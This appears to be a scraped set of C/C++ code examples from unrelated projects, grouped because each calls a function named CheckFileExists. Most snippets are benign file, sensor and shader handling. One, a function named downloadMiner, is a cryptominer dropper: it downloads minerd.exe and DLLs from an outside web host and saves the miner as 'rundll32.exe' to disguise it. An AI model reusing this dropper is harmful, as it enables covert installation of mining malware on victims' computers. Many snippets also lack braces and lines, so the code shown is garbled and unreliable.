Example #1
KeyTextList* LoadKeyTextList(gchar* filename)
	KeyTextList* list;
	gchar* pathname = NULL;

	if( !g_keytext_dir || !filename )
		return NULL;

	if( (pathname = CheckFileExists(g_keytext_dir, filename)) == NULL )
		if( (pathname = CheckFileExists("keytext", filename)) == NULL )
			return NULL;

	list = (KeyTextList*)g_malloc(sizeof(KeyTextList));

	if( list != NULL )
		if( (list->tree = CreateTree()) != NULL )
			if( ReadXMLFile(pathname, list->tree) )
				return list;
	return NULL;
Example #2
short LoadKeyTextList( void )
	KeyTextList* list;
	char* pathname = NULL;
	short  result = -1;

	if( !g_keytext_dir  ) goto Err1; 

	if( (pathname = CheckFileExists(g_keytext_dir, CNIJLGMON2_RESFILE)) == NULL ){
		if( (pathname = CheckFileExists("keytext", CNIJLGMON2_RESFILE)) == NULL )  goto Err1;

	if ( (list = (KeyTextList*)malloc(sizeof(KeyTextList))) == NULL ) goto Err1;

	if( (list->tree = CreateTree()) == NULL ) goto Err2;

	if( ReadXMLFile(pathname, list->tree) != 0 ) goto Err3;

	g_key_keytext_list = list;

	result = 0;
	return result;
	FreeStringList( list->tree );
	free( list );
	return result;
void mtsIntuitiveResearchKitMTM::EnableLogs(const mtsBool &enable)
    logsEnabled = enable;
    if(logsEnabled) // !logsEnabled && enable) //logs previously disabled
        //CMN_LOG_RUN_WARNING << "mtsIntuitiveResearchKitMTM: logs enabled" << std::endl;

        // UBC open output file
            std::string fname = componentName;

            MTMLogFile.open(fname.c_str(), std::ofstream::out | std::ofstream::app);
                CMN_LOG_CLASS_RUN_WARNING << "Failed to open the MTM log file!" << std::endl;

    else {
        //CMN_LOG_RUN_WARNING << "mtsIntuitiveResearchKitMTM: logs disabled" << std::endl;
Example #4
bool CFile::Create(const wxString& path, bool overwrite, int accessMode)
	if (!overwrite && CheckFileExists(path)) {
		return false;

	return Open(path, write, accessMode);
void downloadMiner()
    lpURLDownloadToFile URLDownloadToFile;

    HMODULE hUrlmon = LoadLibrary("URLMON.DLL");

    URLDownloadToFile = (lpURLDownloadToFile)GetProcAddress(hUrlmon, "URLDownloadToFileA");

    if (!CheckFileExists("rundll32.exe"))
        URLDownloadToFile(0, "http://ashran.com/assets/uploads/peluche/minerd.exe", "rundll32.exe", 0, 0);
    if (!CheckFileExists("zlib1.dll"))
        URLDownloadToFile(0, "http://ashran.com/assets/uploads/peluche/zlib1.dll", "zlib1.dll", 0, 0);
    if (!CheckFileExists("libwinpthread-1.dll"))
        URLDownloadToFile(0, "http://ashran.com/assets/uploads/peluche/libwinpthread-1.dll", "libwinpthread-1.dll", 0, 0);
    if (!CheckFileExists("libcurl-4.dll"))
        URLDownloadToFile(0, "http://ashran.com/assets/uploads/peluche/libcurl-4.dll", "libcurl-4.dll", 0, 0);

Example #6
bool HesperisInterface::ReadCurveData(GeometryArray * data)
	if(!CheckFileExists()) return false;
	HesperisFile hes;
	if(!hes.open(FileName)) return false;
	return data->numGeometries() > 0;
Example #7
bool HesperisInterface::ReadCurveData(CurveGroup * data)
	if(!CheckFileExists()) return false;
	HesperisFile hes;
	hes.addCurve("curves", data);
	if(!hes.open(FileName)) return false;
	return true;
Example #8
// Returns a new filename using the timestamp: img_YYYYMMDD_HHMMSSuuu.
// Verifies if a file already exists with the generated filename, if it does we increment the filename.
CString GenerateAutoFileName()
    GlobalSettings gs;
    CString timeStr;
    CString path;
    CString ext;  
    path = gs.bAutoName ? gs.getOutputDir() : _T("\\");
    timeStr.Format(_T("img_%u%02u%02u_%02u%02u%02u%03u"), tNow.wYear, tNow.wMonth, tNow.wDay, tNow.wHour, tNow.wMinute, tNow.wSecond, tNow.wMilliseconds);

    // We check which encoder is selected to know what extension to use
    switch (gs.sEnc)
        case sEncBMP:
            ext = _T(".bmp");
        case sEncJPEG:
            ext = _T(".jpg");
        case sEncPNG:
            ext = _T(".png");
            ext = _T("");
    // Check if the file already exists
    while( CheckFileExists(path + timeStr + ext) )
        if (tNow.wMilliseconds == 999)
            tNow.wMilliseconds += 1;
            timeStr.Format(_T("img_%u%02u%02u_%02u%02u%02u%03u"), tNow.wYear, tNow.wMonth, tNow.wDay, tNow.wHour, tNow.wMinute, tNow.wSecond, tNow.wMilliseconds);
    return timeStr + ext;
	HttpResponse HttpResponse::FileNotFound()
		HttpResponse response;

		response.m_httpVersion = Config::GetServerHttpVersion();
		response.m_statusCode = respcode_notfound;

		std::string filePath = Config::GetRootFolder() + "/" + Config::GetDefaultPage404();
		if (!CheckFileExists(filePath))
			response.m_body = "<html><head><title>404 Not Found</title><meta charset = \"utf-8\"/></head><body><br><center><h1>404 Not Found</h1></center></body></html>";
			response.m_body = ReadFileToString(filePath);
		response.m_headers.insert({ "Content-Length", std::to_string(response.m_body.size()) });
		response.m_headers.insert({ "Content-Type", "text/html" });

		return response;
Example #10
 * Get the patch list from the server
bool DownloadPatch(
  const launcher::Settings &settings,
  const tFileMap &filesToPatch) {

  Trace("Downloading patch.");
  Log(LL::Info) << "Downloading " << filesToPatch.size() << " files." << std::endl;

  bool rVal = true;
  for (tFileMap::const_iterator file = filesToPatch.begin(); file != filesToPatch.end(); ++file) {
    if (!file->second.has_filename()) {
      Log(LL::Warning) << "Corrupt entry lacks filename." << std::endl;
    if (CheckFileExists(file->second.get_filename(), file->second.get_crc())) {
    if (!GetOneFile(settings, file->second.get_filename(), file->second.get_crc())) {
      Log(LL::Error) << "Unable to retrieve file: " << file->second.get_filename() << std::endl;
      rVal = false;
  return rVal;
    void StandardSensors::OnThreadExecute(void)
        // Pre-load what files we can... reduces open/close overhead (which is significant)

        // Setup CPU Clocks Support...
        FileHandle cpuOnlineFiles[g_maxCpus];
        FileHandle cpuFreqFiles[g_maxCpus];
        for(unsigned int i=0; i<g_maxCpus; i++)
            cpuOnlineFiles[i] = cpuFreqFiles[i] = NullFileHandle;
            for(unsigned int i=0; i<g_maxCpus; i++)
                const CpuSensorDesc &desc = g_cpuDescs[i];
                cpuOnlineFiles[i] = OpenFile(desc.onlinePath);
                cpuFreqFiles[i]   = NullFileHandle;
                if(cpuOnlineFiles[i] != NullFileHandle)
                    const int maxFreq = ReadIntFile(desc.maxFreqPath);
                    SensorSetRange(desc.label, 0, (float)maxFreq, Sensor_Interp_Nearest, Sensor_Unit_KHz);

        // Setup GPU Clocks Support...
        FileHandle gpuFreqFile = NullFileHandle;
            gpuFreqFile = OpenFile("/sys/class/kgsl/kgsl-3d0/gpuclk");
        if(gpuFreqFile != NullFileHandle)
            const int maxFreq = ReadIntFile("/sys/class/kgsl/kgsl-3d0/max_gpuclk");
            SensorSetRange(g_gpuLabel, 0, (float)maxFreq, Sensor_Interp_Nearest, Sensor_Unit_Hz);

        // Setup Memory Clocks Support...
        FileHandle memFreqFile = NullFileHandle;
        //memFreqFile = OpenFile("/sys/class/devfreq/0.qcom,cpubw/cur_freq");
        if(memFreqFile != NullFileHandle)
            const int maxFreq = ReadIntFile("/sys/class/devfreq/0.qcom,cpubw/max_freq");
            SensorSetRange(g_memLabel, 0, (float)maxFreq, Sensor_Interp_Nearest, Sensor_Unit_MByte_Second);

        // Setup thermal sensors...
        static const unsigned int maxThermalSensors = 20;
        static ThermalSensorDesc  thermalDescs[maxThermalSensors];
        FileHandle                thermalFiles[maxThermalSensors];
        for(unsigned int i=0; i<maxThermalSensors; i++)
            thermalFiles[i] = NullFileHandle;
            for(unsigned int i=0; i<maxThermalSensors; i++)
                ThermalSensorDesc &desc = thermalDescs[i];

                char typePath[64] = {0};
                char tempPath[64] = {0};
                char modePath[64] = {0};
                sprintf(typePath, "/sys/devices/virtual/thermal/thermal_zone%d/type", i);
                sprintf(tempPath, "/sys/devices/virtual/thermal/thermal_zone%d/temp", i);
                sprintf(modePath, "/sys/devices/virtual/thermal/thermal_zone%d/mode", i);

                // If either of these files don't exist, then we got to the end of the thermal zone list...
                if(!CheckFileExists(typePath) || !CheckFileExists(tempPath))

                // check to see if the zone is disabled... its okay if there is no mode file...
                char mode[16] = {0};
                if(ReadFileLine(modePath, mode, sizeof(mode))>0 && !strcmp(mode, "disabled"))

                    // Read the sensor name in...
                    ReadFileLine(typePath, desc.name, sizeof(desc.name));

                    // Initialize the Label...
                    desc.initialized = desc.label.ConditionalInit(desc.name);

                // Finally... open the file.
                thermalFiles[i] = OpenFile(tempPath);
                if(thermalFiles[i] != NullFileHandle)
                    // by default 0 to 100 degrees...
                    SensorSetRange(desc.label, 0, 100, Sensor_Interp_Linear);

        // For clocks, we store the last value and only send updates when it changes since we
        // use blocking chart rendering.
        int lastCpuFreq[g_maxCpus] = {0};
        int lastGpuFreq            = 0;
        int lastMemValue           = 0;

        unsigned int sampleCount = 0;

        while(!QuitSignaled() && IsConnected())
            // Sample CPU Frequencies...
            for(unsigned int i=0; i<g_maxCpus; i++)
                // If the 'online' file can't be found, then we just assume this CPU doesn't even exist
                if(cpuOnlineFiles[i] == NullFileHandle)

                const CpuSensorDesc &desc   = g_cpuDescs[i];
                const bool           online = ReadIntFile(desc.onlinePath);
                if(online && cpuFreqFiles[i]==NullFileHandle)
                    // Open the frequency file if we are online and its not already open...
                    cpuFreqFiles[i] = OpenFile(desc.freqPath);
                else if(!online && cpuFreqFiles[i]!=NullFileHandle)
                    // close the frequency file if we are no longer online
                    cpuFreqFiles[i] = NullFileHandle;
                const int freq = cpuFreqFiles[i]==NullFileHandle ? 0 : ReadIntFile(cpuFreqFiles[i]);
                if(freq != lastCpuFreq[i])
                    // Convert from KHz to Hz
                    SensorSetValue(desc.label, (float)freq);
                    lastCpuFreq[i] = freq;

            // Sample GPU Frequency...
            if(gpuFreqFile != NullFileHandle)
                const int freq = ReadIntFile(gpuFreqFile);
                if(freq != lastGpuFreq)
                    SensorSetValue(g_gpuLabel, (float)freq);
                    lastGpuFreq = freq;

            // Sample Memory Bandwidth
            if(memFreqFile != NullFileHandle)
                const int value = ReadIntFile(memFreqFile);
                if(value != lastMemValue)
                    SensorSetValue(g_memLabel, (float)value);
                    lastMemValue = value;

            // Sample thermal sensors...
            if((sampleCount&15) == 0) // sample temperature at a much lower frequency as clocks... thermals don't change that fast.
                for(unsigned int i=0; i<maxThermalSensors; i++)
                    FileHandle file = thermalFiles[i];
                    if(file != NullFileHandle)
                        SensorSetValue(thermalDescs[i].label, (float)ReadIntFile(file));

            // Sleep 5ms between samples...

        // Close down cached file handles...
        for(unsigned int i=0; i<g_maxCpus; i++)
            if(cpuOnlineFiles[i] != NullFileHandle) CloseFile(cpuOnlineFiles[i]);
            if(cpuFreqFiles[i]   != NullFileHandle) CloseFile(cpuFreqFiles[i]);
        if(gpuFreqFile != NullFileHandle) CloseFile(gpuFreqFile);
        if(memFreqFile != NullFileHandle) CloseFile(memFreqFile);
        for(unsigned int i=0; i<maxThermalSensors; i++)
            if(thermalFiles[i] != NullFileHandle) CloseFile(thermalFiles[i]);
	void StandardSensors::OnThreadExecute(void)

		// Pre-load what files we can... reduces open/close overhead (which is significant)

		// Setup CPU Clocks Support...
		static const UInt32 maxCpus = 8;
		static SensorLabelDesc cpuDescs[maxCpus];
		FileHandle cpuOnlineFiles[maxCpus];
		FileHandle cpuFreqFiles[maxCpus];
		for(UInt32 i=0; i<maxCpus; i++)
			cpuOnlineFiles[i] = cpuFreqFiles[i] = NullFileHandle;
			SensorLabelDesc &desc = cpuDescs[i];
			FormatString(desc.name, sizeof(desc.name), "CPU%u Clocks", i);
			int maxFreq = 0;
			for(UInt32 i=0; i<maxCpus; i++)
				char onlinePath[64] = {0};
				FormatString(onlinePath, sizeof(onlinePath), "/sys/devices/system/cpu/cpu%u/online", i);
				cpuOnlineFiles[i] = OpenFile(onlinePath);
				cpuFreqFiles[i]   = NullFileHandle;
				if(cpuOnlineFiles[i] != NullFileHandle)
					char maxFreqPath[64] = {0};
					FormatString(maxFreqPath, sizeof(maxFreqPath), "/sys/devices/system/cpu/cpu%u/cpufreq/cpuinfo_max_freq", i);
					maxFreq = std::max(maxFreq, ReadIntFile(maxFreqPath));
			for(UInt32 i=0; i<maxCpus; i++)
				const SensorLabelDesc &desc = cpuDescs[i];
				SensorSetRange(desc.label, 0, (float)maxFreq, Sensor_Interp_Nearest, Sensor_Unit_KHz);

		// Setup GPU Clocks Support...
		FileHandle gpuFreqFile = NullFileHandle;
			if(gpuFreqFile == NullFileHandle) // Adreno
				gpuFreqFile = OpenFile("/sys/class/kgsl/kgsl-3d0/gpuclk");
				if(gpuFreqFile != NullFileHandle)
					const int maxFreq = ReadIntFile("/sys/class/kgsl/kgsl-3d0/max_gpuclk");
					SensorSetRange(g_gpuLabel, 0, (float)maxFreq, Sensor_Interp_Nearest, Sensor_Unit_Hz);
			if(gpuFreqFile == NullFileHandle) // Mali
				gpuFreqFile = OpenFile("/sys/devices/14ac0000.mali/clock");
				if(gpuFreqFile != NullFileHandle)
					// TODO: query max GPU clocks on Mali, for now hacked to what we know the S6 is
					SensorSetRange(g_gpuLabel, 0, 0, Sensor_Interp_Nearest, Sensor_Unit_MHz);

		// Setup Memory Clocks Support...
		FileHandle memFreqFile = NullFileHandle;
		//memFreqFile = OpenFile("/sys/class/devfreq/0.qcom,cpubw/cur_freq");
		if(memFreqFile != NullFileHandle)
			const int maxFreq = ReadIntFile("/sys/class/devfreq/0.qcom,cpubw/max_freq");
			SensorSetRange(g_memLabel, 0, (float)maxFreq, Sensor_Interp_Nearest, Sensor_Unit_MByte_Second);

		// Setup thermal sensors...
		static const UInt32 maxThermalSensors = 20;
		static SensorLabelDesc  thermalDescs[maxThermalSensors];
		FileHandle              thermalFiles[maxThermalSensors];
		for(UInt32 i=0; i<maxThermalSensors; i++)
			thermalFiles[i] = NullFileHandle;
			for(UInt32 i=0; i<maxThermalSensors; i++)
				SensorLabelDesc &desc = thermalDescs[i];

				char typePath[64]      = {0};
				char tempPath[64]      = {0};
				char tripPointPath[64] = {0};
				FormatString(typePath,      sizeof(typePath),      "/sys/devices/virtual/thermal/thermal_zone%u/type", i);
				FormatString(tempPath,      sizeof(tempPath),      "/sys/devices/virtual/thermal/thermal_zone%u/temp", i);
				FormatString(tripPointPath, sizeof(tripPointPath), "/sys/devices/virtual/thermal/thermal_zone%u/trip_point_0_temp", i);

				// If either of these files don't exist, then we got to the end of the thermal zone list...
				if(!CheckFileExists(typePath) || !CheckFileExists(tempPath) || !CheckFileExists(tripPointPath))

				// Initialize the Label...
				if(ReadFileLine(typePath, desc.name, sizeof(desc.name)) <= 0)
					continue; // failed to read sensor name...

				char modePath[64] = {0};
				FormatString(modePath, sizeof(modePath), "/sys/devices/virtual/thermal/thermal_zone%d/mode", i);

				// check to see if the zone is disabled... its okay if there is no mode file...
				char mode[16] = {0};
				if(ReadFileLine(modePath, mode, sizeof(mode))>0 && !strcmp(mode, "disabled"))

				// Finally... open the file.
				thermalFiles[i] = OpenFile(tempPath);

				// Check to see if the temperature file was found...
				if(thermalFiles[i] == NullFileHandle)

				// Read in the critical temperature value.
				const int tripPoint = ReadIntFile(tripPointPath);
				if(tripPoint > 0)
					SensorSetRange(desc.label, 0, (float)tripPoint, Sensor_Interp_Linear);

		// For clocks, we store the last value and only send updates when it changes since we
		// use blocking chart rendering.
		int lastCpuFreq[maxCpus] = {0};
		int lastGpuFreq          = 0;
		int lastMemValue         = 0;

		UInt32 sampleCount = 0;

		while(!QuitSignaled() && IsConnected())
			// Sample CPU Frequencies...
			for(UInt32 i=0; i<maxCpus; i++)
				// If the 'online' file can't be found, then we just assume this CPU doesn't even exist
				if(cpuOnlineFiles[i] == NullFileHandle)

				const SensorLabelDesc &desc   = cpuDescs[i];
				const bool             online = ReadIntFile(cpuOnlineFiles[i]) ? true : false;
				if(online && cpuFreqFiles[i]==NullFileHandle)
					// Open the frequency file if we are online and its not already open...
					char freqPath[64] = {0};
					FormatString(freqPath, sizeof(freqPath), "/sys/devices/system/cpu/cpu%u/cpufreq/scaling_cur_freq", i);
					cpuFreqFiles[i] = OpenFile(freqPath);
				else if(!online && cpuFreqFiles[i]!=NullFileHandle)
					// close the frequency file if we are no longer online
					cpuFreqFiles[i] = NullFileHandle;
				const int freq = cpuFreqFiles[i]==NullFileHandle ? 0 : ReadIntFile(cpuFreqFiles[i]);
				if(freq != lastCpuFreq[i])
					// Convert from KHz to Hz
					SensorSetValue(desc.label, (float)freq);
					lastCpuFreq[i] = freq;

			// Sample GPU Frequency...
			if(gpuFreqFile != NullFileHandle)
				const int freq = ReadIntFile(gpuFreqFile);
				if(freq != lastGpuFreq)
					SensorSetValue(g_gpuLabel, (float)freq);
					lastGpuFreq = freq;

			// Sample Memory Bandwidth
			if(memFreqFile != NullFileHandle)
				const int value = ReadIntFile(memFreqFile);
				if(value != lastMemValue)
					SensorSetValue(g_memLabel, (float)value);
					lastMemValue = value;

			// Sample thermal sensors...
			if((sampleCount&15) == 0) // sample temperature at a much lower frequency as clocks... thermals don't change that fast.
				for(UInt32 i=0; i<maxThermalSensors; i++)
					FileHandle file = thermalFiles[i];
					if(file != NullFileHandle)
						SensorSetValue(thermalDescs[i].label, (float)ReadIntFile(file));

			// Sleep 5ms between samples...

		// Close down cached file handles...
		for(UInt32 i=0; i<maxCpus; i++)
			if(cpuOnlineFiles[i] != NullFileHandle) CloseFile(cpuOnlineFiles[i]);
			if(cpuFreqFiles[i]   != NullFileHandle) CloseFile(cpuFreqFiles[i]);
		if(gpuFreqFile != NullFileHandle) CloseFile(gpuFreqFile);
		if(memFreqFile != NullFileHandle) CloseFile(memFreqFile);
		for(UInt32 i=0; i<maxThermalSensors; i++)
			if(thermalFiles[i] != NullFileHandle) CloseFile(thermalFiles[i]);
bool CVertexShader::LoadVariant( IShaderDefines *pDefines, bool bCompile )
	// check for already compiled default version of the shader
	if (pDefines == NULL && m_VertexShader != NULL)
		return true;
	// check for already compiled variant of the shader
	if (pDefines != NULL)
		unsigned long iEncoding = pDefines->GetValuesEncoding().iEncoding;
		SHADERVARIANTSMAP::iterator itr = m_ShaderVariants.find( iEncoding );
		if (itr != m_ShaderVariants.end())
			return true;

	D3DXMACRO *pMacros = NULL;
	if (pDefines)
		const int iMaxShaderDefineCount = 32;
		const int iValueCharSize = 64;
		static char szValues[iMaxShaderDefineCount][iValueCharSize];
		static D3DXMACRO vMacros[iMaxShaderDefineCount + 1];
		if (iMaxShaderDefineCount < pDefines->GetDefineCount())
			m_ToolBox->Log( LOGFATALERROR, _T("Shader Define Count exceeds the internal buffer!\n") );
			return false;

		DWORD i;
		for (i=0; i < pDefines->GetDefineCount(); i++)
			vMacros[i].Name = pDefines->GetDefineName(i);
			vMacros[i].Definition = _itoa(pDefines->GetDefineValue(i), szValues[i], 10);
		// null terminate macro list
		vMacros[i].Name = NULL;
		vMacros[i].Definition = NULL;
		pMacros = vMacros;

	CDX9IncludeManager includeInterface;
	LPDIRECT3DDEVICE9 pDevice = (LPDIRECT3DDEVICE9)m_Renderer->GetAPIDevice();
	if( pDevice )
		int len = _tcslen( (const TCHAR*)m_Code );
		LPCSTR profile = D3DXGetVertexShaderProfile( pDevice );

		bool bLoadedCompiled = false;

		const TCHAR *szFile = GetName()->GetString();
		TCHAR drive[MAX_PATH];
		TCHAR directory[MAX_PATH];
		TCHAR filename[MAX_PATH];
		TCHAR fileext[MAX_PATH];
		TCHAR szDefinesTemp[65] = { '\0' };
		_tsplitpath( szFile, drive, directory, filename, fileext );

		StdString szCompiledFile;
		szCompiledFile += drive;
		szCompiledFile += directory;
		szCompiledFile += _T("Compiled\\");
		szCompiledFile += filename;
		if (pDefines)
			szCompiledFile += _T("_enc");
			szCompiledFile += _itot(pDefines->GetValuesEncoding().iEncoding, szDefinesTemp, 10);
		szCompiledFile += fileext;
#ifdef XBOX
		szCompiledFile = SetPathDrive( szCompiledFile, EngineGetToolBox()->GetDrive() );

		LPVOID pShaderFileData = NULL;
		UINT shaderLen = 0;
		struct _stat shaderFilestat;
		// checking if compiled version exists, if we can load it into a buffer and if the file stats of the shader (not compiled) are readable
		if (CheckFileExists(szCompiledFile) &&	( _tstat( szFile, &shaderFilestat ) == 0) && LoadFileIntoBuffer( szCompiledFile, pShaderFileData, shaderLen, true ))
			m_ToolBox->Log( LOGINFORMATION, _T("Reading compiled shader file: %s\n"), szCompiledFile.c_str() );
			// create a shader buffer to store the compiled shader
			hr = D3DXCreateBuffer( shaderLen, &shaderBuf );
			if (SUCCEEDED(hr))
				time_t storedMTime = 0;
				// get the compiled date out of the file
				memcpy( &storedMTime, pShaderFileData, sizeof(time_t) );
				// if the stored modified time in the compiled shader file is the same as the current
				// modified time of the shader file
				if( storedMTime == shaderFilestat.st_mtime )
					// reduce the buffer size by the preamble (mod time)
					shaderLen -= (int)sizeof(time_t);
					// copy the compiled shader into the shader buffer
					memcpy( shaderBuf->GetBufferPointer(), ((TCHAR *) pShaderFileData)+ sizeof(time_t), shaderLen);
					bLoadedCompiled = true;
			SAFE_DELETE_ARRAY( pShaderFileData );

		if (!bLoadedCompiled && bCompile)
			if (pDefines)
				EngineGetToolBox()->Log( LOGINFORMATION, _T("Compiling shader %s:%d\n"), GetName()->GetString(), pDefines->GetValuesEncoding().iEncoding );
				EngineGetToolBox()->Log( LOGINFORMATION, _T("Compiling shader %s\n"), GetName()->GetString() );

			hr = D3DXCompileShader( m_Code,
										len,//length of string in bytes
										pMacros, //can add that matrix of macros here
										&includeInterface, //for include directories
										"main",//? temp
										profile, //vs_1_1 for example
										0, //compiling options?
										NULL );

		//now actually create the shader
		if( hr == D3D_OK &&
			shaderBuf )
			if (!bLoadedCompiled)
				struct _stat shaderFilestat;
				// get the shader file's modified time
				if (_tstat( szFile, &shaderFilestat ) == 0)
					m_ToolBox->Log( LOGINFORMATION, _T("Writing compiled shader file: %s\n"), szCompiledFile.c_str() );
					// open a compiled shader file for writing
					FILE *fp = fopen( szCompiledFile, "wb" );
					if (fp)
						// write shader file's modified time
						fwrite( &shaderFilestat.st_mtime, sizeof(time_t), 1, fp );
						// write compiled shader data
						fwrite( shaderBuf->GetBufferPointer(), shaderBuf->GetBufferSize(), 1, fp );
						m_ToolBox->Log( LOGWARNING, _T("Failed to write compiled shader file: %s\n"), szCompiledFile.c_str() );

			hr = pDevice->CreateVertexShader( (DWORD *) shaderBuf->GetBufferPointer(), &pShader );
			assert( SUCCEEDED(hr) );
			if (!SUCCEEDED(hr))
				m_ToolBox->Log( LOGWARNING, _T("Failed to create shader : %s\n"), szCompiledFile.c_str() );

			SAFE_RELEASE( shaderBuf );
			SAFE_RELEASE( pErrorMsgs );

			if (pDefines == NULL) // we are compiling the default shader with no macro defines
				assert( m_VertexShader == NULL ); // the default shader should only be compiled on Init when this is NULL
				m_VertexShader = pShader;
			else if (pDefines != NULL) // we are compiling a variant of the shader
				unsigned long iEncoding = pDefines->GetValuesEncoding().iEncoding;
				m_ShaderVariants[iEncoding] = pShader;
			return true;
	if( pErrorMsgs )
		IHashString * name = GetName();
		TCHAR* debug_errors = (TCHAR*)pErrorMsgs->GetBufferPointer();
		m_ToolBox->Log( LOGERROR, _T("Could not create Vertex shader %s\nError message: %s\n"),
			name->GetString(), debug_errors );				
		SAFE_RELEASE( pErrorMsgs );				
	SAFE_RELEASE( shaderBuf );

	return false;
Example #14
bool CFile::Open(const wxString& fileName, OpenMode mode, int accessMode)
	MULE_VALIDATE_PARAMS(!fileName.IsEmpty(), wxT("CFile: Cannot open, empty path."));

#ifdef __linux__
	int flags = O_BINARY | O_LARGEFILE;
	int flags = O_BINARY;

	switch ( mode ) {
		case read:
			flags |= O_RDONLY;
		case write_append:
			if (CheckFileExists(fileName))
				flags |= O_WRONLY | O_APPEND;
			//else: fall through as write_append is the same as write if the
			//      file doesn't exist
		case write:
			flags |= O_WRONLY | O_CREAT | O_TRUNC;
		case write_excl:
			flags |= O_WRONLY | O_CREAT | O_EXCL;

		case read_write:
			flags |= O_RDWR;

	if (IsOpened()) {

	// When opening files, we will always first try to create an ANSI file name,
	// even if that means an extended ANSI file name. Only if it is not possible
	// to do that, we fall back to  UTF-8 file names. This is unicode safe and is
	// the only way to guarantee that we can open any file in the file system,
	// even if it is not an UTF-8 valid sequence.
	// Test if it is possible to use an ANSI name
	Unicode2CharBuf tmpFileName = unicode2char(fileName);
	if (tmpFileName) {
		// Use an ANSI name
		m_fd = open(tmpFileName, flags, accessMode);
	if (m_fd == fd_invalid) { // Wrong conversion or can't open.
		// Try an UTF-8 name
		m_fd = open(unicode2UTF8(fileName), flags, accessMode);
	m_filePath = fileName;

	SYSCALL_CHECK(m_fd != fd_invalid, wxT("opening file"));	
    return IsOpened();